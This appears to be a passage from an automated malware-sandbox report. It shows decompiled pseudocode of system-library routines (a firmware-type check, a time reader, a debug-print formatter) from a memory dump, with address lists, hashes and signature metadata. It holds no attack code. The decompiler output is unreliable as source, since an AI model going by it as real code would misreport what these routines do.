                                                      0x049ce730
                                                      0x049ce735
                                                      0x049ce73d
                                                      0x049ce73f
                                                      0x00000000
                                                      0x00000000
                                                      0x049ce741
                                                      0x049ce741
                                                      0x00000000
                                                      0x049ce741
                                                      0x049ce739
                                                      0x00000000
                                                      0x00000000
                                                      0x049ce73b
                                                      0x00000000
                                                      0x049ce73b
                                                      0x049ce722
                                                      0x049ce720
                                                      0x049ce6b0
                                                      0x049ce618
                                                      0x00000000
                                                      0x049ce618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: cf0169949ef8b783061a69a4fbfd4afd096af8e309260c671d4c9a8f1a298f27
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 4D9159712443469FEB24CE25C945B2BB7EAAFC4714F14893DF99ACA280E774F904CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049851BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E049851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x49e05f0);
				E0495D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0491EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E049853CA(0);
						return E0495D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0494F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04923690(1, _t117, 0x48e1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0494AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04924620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0494AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0498500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04949860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x049851be
                                                      0x049851c3
                                                      0x049851c8
                                                      0x049851cd
                                                      0x049851d0
                                                      0x049851d3
                                                      0x049851d8
                                                      0x049851db
                                                      0x049851de
                                                      0x049851e0
                                                      0x049851e3
                                                      0x049851e6
                                                      0x049851e8
                                                      0x04985342
                                                      0x04985351
                                                      0x04985356
                                                      0x0498535a
                                                      0x04985360
                                                      0x04985363
                                                      0x04985366
                                                      0x04985369
                                                      0x04985369
                                                      0x0498536b
                                                      0x0498536b
                                                      0x04985370
                                                      0x049853a3
                                                      0x049853a4
                                                      0x049853a6
                                                      0x049853ab
                                                      0x049853ab
                                                      0x049853ae
                                                      0x049853ae
                                                      0x049853b5
                                                      0x049853bf
                                                      0x049853bf
                                                      0x04985375
                                                      0x04985396
                                                      0x049853a0
                                                      0x049853a0
                                                      0x00000000
                                                      0x04985396
                                                      0x04985377
                                                      0x04985379
                                                      0x0498537f
                                                      0x0498538c
                                                      0x04985390
                                                      0x00000000
                                                      0x04985390
                                                      0x049851ee
                                                      0x049851f1
                                                      0x04985301
                                                      0x04985310
                                                      0x04985315
                                                      0x04985318
                                                      0x0498531b
                                                      0x04985320
                                                      0x0498532e
                                                      0x04985331
                                                      0x00000000
                                                      0x04985331
                                                      0x04985328
                                                      0x04985329
                                                      0x00000000
                                                      0x04985329
                                                      0x049851fa
                                                      0x04985235
                                                      0x04985236
                                                      0x04985239
                                                      0x0498523f
                                                      0x04985240
                                                      0x04985241
                                                      0x04985242
                                                      0x04985246
                                                      0x04985247
                                                      0x0498524e
                                                      0x04985251
                                                      0x04985267
                                                      0x04985269
                                                      0x0498526e
                                                      0x0498527d
                                                      0x0498527e
                                                      0x04985281
                                                      0x04985282
                                                      0x04985287
                                                      0x04985288
                                                      0x0498528a
                                                      0x0498528f
                                                      0x04985294
                                                      0x00000000
                                                      0x00000000
                                                      0x0498529a
                                                      0x0498529c
                                                      0x0498529e
                                                      0x0498529e
                                                      0x049852a4
                                                      0x049852b0
                                                      0x00000000
                                                      0x00000000
                                                      0x049852ba
                                                      0x049852bc
                                                      0x049852bc
                                                      0x049852d4
                                                      0x049852d9
                                                      0x049852dc
                                                      0x049852e1
                                                      0x00000000
                                                      0x00000000
                                                      0x049852e7
                                                      0x049852f4
                                                      0x00000000
                                                      0x049852f4
                                                      0x04985270
                                                      0x00000000
                                                      0x04985270
                                                      0x049851fc
                                                      0x049851fd
                                                      0x04985202
                                                      0x04985203
                                                      0x04985205
                                                      0x0498520a
                                                      0x0498520f
                                                      0x00000000
                                                      0x00000000
                                                      0x0498521b
                                                      0x04985226
                                                      0x0498522b
                                                      0x0498521d
                                                      0x0498521d
                                                      0x04985222
                                                      0x04985222
                                                      0x0498522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: ed7b9115f177dae351fdac7ece9db9de9bc39cfdb8a537cad570d8cd30b82e27
                                                      • Instruction ID: ae7f11ae955baae995e9cd996ac5085b624bef1ada6dabc54ccd7e69f94d1656
                                                      • Opcode Fuzzy Hash: ed7b9115f177dae351fdac7ece9db9de9bc39cfdb8a537cad570d8cd30b82e27
                                                      • Instruction Fuzzy Hash: 0F518E71E00619EFDB25EFA8C840AADB7F9FF44714F55443EE509EB251EA71A904CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0492B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x49fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04927D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E049D8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04949E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0494B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0494CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04927D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E049D8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0494AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x49f8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x49f862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x49f8628; // 0x0
							_t116 =  *0x49f862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                      0x0492b94c
                                                      0x0492b956
                                                      0x0492b95c
                                                      0x0492b95e
                                                      0x0492b964
                                                      0x0492b969
                                                      0x0492b96d
                                                      0x0492b96d
                                                      0x0492b970
                                                      0x0492b974
                                                      0x0492b97a
                                                      0x0492badf
                                                      0x0492badf
                                                      0x0492bae2
                                                      0x0492bae4
                                                      0x0492bae6
                                                      0x0492baf0
                                                      0x04972cb8
                                                      0x0492baf6
                                                      0x0492baf6
                                                      0x0492baf6
                                                      0x0492bafd
                                                      0x0492bb1f
                                                      0x0492bb1f
                                                      0x0492baff
                                                      0x0492bb00
                                                      0x0492bb00
                                                      0x0492bb03
                                                      0x0492bb03
                                                      0x0492bacb
                                                      0x0492bacf
                                                      0x0492bad0
                                                      0x0492bad1
                                                      0x0492badc
                                                      0x0492badc
                                                      0x0492b980
                                                      0x0492b980
                                                      0x0492b988
                                                      0x0492b98b
                                                      0x0492b98d
                                                      0x0492b990
                                                      0x0492b993
                                                      0x0492b999
                                                      0x0492b99b
                                                      0x0492b9a1
                                                      0x0492b9a5
                                                      0x0492b9aa
                                                      0x0492b9b0
                                                      0x0492b9bb
                                                      0x0492b9c0
                                                      0x0492b9c3
                                                      0x0492b9ca
                                                      0x0492b9cc
                                                      0x0492b9cf
                                                      0x0492b9d3
                                                      0x0492b9d7
                                                      0x0492ba94
                                                      0x0492ba94
                                                      0x0492ba98
                                                      0x0492baa3
                                                      0x04972ccb
                                                      0x0492baa9
                                                      0x0492baa9
                                                      0x0492baa9
                                                      0x0492bab1
                                                      0x04972cd5
                                                      0x04972cdd
                                                      0x04972cdd
                                                      0x0492babb
                                                      0x0492babc
                                                      0x0492bac2
                                                      0x0492bac3
                                                      0x0492bac3
                                                      0x0492bac6
                                                      0x00000000
                                                      0x0492b9dd
                                                      0x0492b9dd
                                                      0x0492b9e7
                                                      0x0492b9e7
                                                      0x0492b9ec
                                                      0x0492b9ec
                                                      0x0492b9f1
                                                      0x0492b9f5
                                                      0x0492b9fa
                                                      0x0492ba00
                                                      0x0492ba0c
                                                      0x0492ba10
                                                      0x0492ba10
                                                      0x0492ba12
                                                      0x0492ba18
                                                      0x00000000
                                                      0x00000000
                                                      0x0492bb26
                                                      0x0492bb26
                                                      0x0492ba1e
                                                      0x0492ba1e
                                                      0x0492ba23
                                                      0x0492ba25
                                                      0x0492ba2c
                                                      0x0492ba30
                                                      0x0492ba35
                                                      0x0492ba35
                                                      0x0492ba41
                                                      0x0492ba46
                                                      0x0492ba4c
                                                      0x0492ba50
                                                      0x0492ba54
                                                      0x0492ba6a
                                                      0x0492ba6e
                                                      0x0492ba70
                                                      0x0492ba74
                                                      0x0492ba78
                                                      0x0492ba7a
                                                      0x0492ba7c
                                                      0x0492ba8e
                                                      0x0492ba90
                                                      0x0492ba92
                                                      0x0492bb14
                                                      0x0492bb14
                                                      0x0492bb16
                                                      0x0492bb16
                                                      0x00000000
                                                      0x0492ba7c
                                                      0x0492bb0a
                                                      0x0492bb0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0492bb0f

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0492B9A5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: be2326877862cdc877914268339d6660b73a784099dec4e7a259eeb40293062c
                                                      • Instruction ID: 5255f33563afc6a2eb19fb2d369976a27dbf0bc5c0ee67ea77f35c4c805964c8
                                                      • Opcode Fuzzy Hash: be2326877862cdc877914268339d6660b73a784099dec4e7a259eeb40293062c
                                                      • Instruction Fuzzy Hash: 97514871A08321DFC720DF29C58092ABBE9FB88714F14897EE59597359E731F844CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0490B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x49df7a8);
				E0495D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0495D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0494D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0494F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0495DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0494B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0494B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0494E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0494A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                      0x0490b171
                                                      0x0490b171
                                                      0x0490b171
                                                      0x0490b171
                                                      0x0490b171
                                                      0x0490b176
                                                      0x0490b17b
                                                      0x0490b180
                                                      0x0490b186
                                                      0x0490b18f
                                                      0x0490b198
                                                      0x0490b1a4
                                                      0x0490b1aa
                                                      0x04964802
                                                      0x04964802
                                                      0x04964805
                                                      0x0496480c
                                                      0x0496480e
                                                      0x0490b1d1
                                                      0x0490b1d3
                                                      0x0490b1de
                                                      0x0490b1de
                                                      0x04964817
                                                      0x0496481e
                                                      0x04964820
                                                      0x04964822
                                                      0x04964822
                                                      0x04964824
                                                      0x04964824
                                                      0x0496482a
                                                      0x00000000
                                                      0x00000000
                                                      0x04964835
                                                      0x0496483a
                                                      0x0496483d
                                                      0x0496483f
                                                      0x04964842
                                                      0x04964842
                                                      0x04964842
                                                      0x04964846
                                                      0x0496484c
                                                      0x0496484e
                                                      0x04964851
                                                      0x04964851
                                                      0x04964853
                                                      0x04964854
                                                      0x04964854
                                                      0x04964858
                                                      0x0496485a
                                                      0x0496485a
                                                      0x0496485d
                                                      0x0496485f
                                                      0x04964861
                                                      0x04964861
                                                      0x04964866
                                                      0x0496486b
                                                      0x0496486e
                                                      0x04964871
                                                      0x04964876
                                                      0x04964876
                                                      0x04964878
                                                      0x0496487b
                                                      0x04964884
                                                      0x04964884
                                                      0x00000000
                                                      0x0496487d
                                                      0x0496487d
                                                      0x04964882
                                                      0x04964889
                                                      0x04964889
                                                      0x0496488f
                                                      0x04964891
                                                      0x049648e0
                                                      0x049648e2
                                                      0x049648e4
                                                      0x049648e4
                                                      0x049648e7
                                                      0x049648e7
                                                      0x049648ed
                                                      0x049648f4
                                                      0x049648f6
                                                      0x04964951
                                                      0x04964951
                                                      0x04964953
                                                      0x04964953
                                                      0x04964956
                                                      0x04964956
                                                      0x04964958
                                                      0x04964959
                                                      0x04964959
                                                      0x0496495d
                                                      0x0496495d
                                                      0x0496495f
                                                      0x0496495f
                                                      0x04964965
                                                      0x04964969
                                                      0x049649ba
                                                      0x049649ba
                                                      0x049649c1
                                                      0x049649c5
                                                      0x049649cc
                                                      0x049649d4
                                                      0x049649d7
                                                      0x049649da
                                                      0x049649e4
                                                      0x049649e5
                                                      0x049649f3
                                                      0x04964a02
                                                      0x00000000
                                                      0x04964a02
                                                      0x04964972
                                                      0x04964974
                                                      0x00000000
                                                      0x00000000
                                                      0x04964976
                                                      0x04964979
                                                      0x04964982
                                                      0x04964983
                                                      0x04964984
                                                      0x0496498b
                                                      0x0496498d
                                                      0x04964991
                                                      0x04964993
                                                      0x04964999
                                                      0x0496499d
                                                      0x049649a2
                                                      0x049649a2
                                                      0x049649a2
                                                      0x04964999
                                                      0x049649ac
                                                      0x00000000
                                                      0x049649b3
                                                      0x049648f8
                                                      0x049648fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049648fe
                                                      0x04964895
                                                      0x0496489c
                                                      0x049648ad
                                                      0x049648b2
                                                      0x049648b5
                                                      0x049648b7
                                                      0x049648ba
                                                      0x049648bc
                                                      0x049648c6
                                                      0x049648c6
                                                      0x049648cb
                                                      0x049648d1
                                                      0x049648d4
                                                      0x049648d8
                                                      0x049648d8
                                                      0x00000000
                                                      0x049648d8
                                                      0x049648be
                                                      0x049648c0
                                                      0x00000000
                                                      0x00000000
                                                      0x049648c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049648c4
                                                      0x00000000
                                                      0x04964882
                                                      0x0496487b
                                                      0x04964904
                                                      0x04964906
                                                      0x00000000
                                                      0x00000000
                                                      0x04964908
                                                      0x0496490e
                                                      0x00000000
                                                      0x00000000
                                                      0x04964910
                                                      0x04964917
